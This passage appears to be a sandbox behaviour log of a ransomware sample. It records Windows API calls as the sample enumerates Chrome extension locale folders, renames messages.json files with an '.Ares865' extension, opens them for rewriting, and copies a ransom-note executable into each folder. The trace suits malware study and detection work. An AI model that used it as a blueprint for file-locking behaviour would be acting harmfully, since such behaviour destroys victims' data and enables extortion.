13 [0102.366] lstrlenW (lpString="Ares865") returned 7 [0102.366] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.366] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json.Ares865") returned 160 [0102.366] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.367] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.368] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=235) returned 1 [0102.374] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi" [0102.374] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi" [0102.374] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.374] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.375] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.375] GetLastError () returned 0x0 [0102.375] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.375] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84169f20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ea36720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ea36720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.375] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.375] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.375] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.375] lstrlenW (lpString="messages.json") returned 13 [0102.375] lstrlenW (lpString="Ares865") returned 7 [0102.376] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.376] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json.Ares865") returned 160 [0102.376] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.377] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.377] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=282) returned 1 [0102.381] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he" [0102.381] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he" [0102.381] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.381] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.381] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.382] GetLastError () returned 0x0 [0102.382] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.382] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x841629f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ea36720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ea36720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.382] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.382] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.382] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.382] lstrlenW (lpString="messages.json") returned 13 [0102.382] lstrlenW (lpString="Ares865") returned 7 [0102.382] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.382] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json.Ares865") returned 160 [0102.383] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.384] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.384] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=238) returned 1 [0102.387] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr" [0102.387] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr" [0102.387] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.387] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.388] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.388] GetLastError () returned 0x0 [0102.388] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.388] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8415b4c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ea36720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ea36720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.389] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.389] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.389] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.389] lstrlenW (lpString="messages.json") returned 13 [0102.389] lstrlenW (lpString="Ares865") returned 7 [0102.389] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.389] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json.Ares865") returned 160 [0102.389] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.390] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.391] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=226) returned 1 [0102.394] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil" [0102.394] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil" [0102.394] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.394] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.395] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.395] GetLastError () returned 0x0 [0102.396] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.396] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84153f90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ea36720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ea36720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.396] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.396] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.396] lstrcpyW (in: lpString1=0x2cce518, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.396] lstrlenW (lpString="messages.json") returned 13 [0102.396] lstrlenW (lpString="Ares865") returned 7 [0102.396] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.396] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json.Ares865") returned 161 [0102.396] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.397] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.398] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=223) returned 1 [0102.401] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi" [0102.401] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi" [0102.401] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.401] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.402] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.402] GetLastError () returned 0x0 [0102.402] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.402] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84147c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ea5c880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ea5c880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.402] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.402] 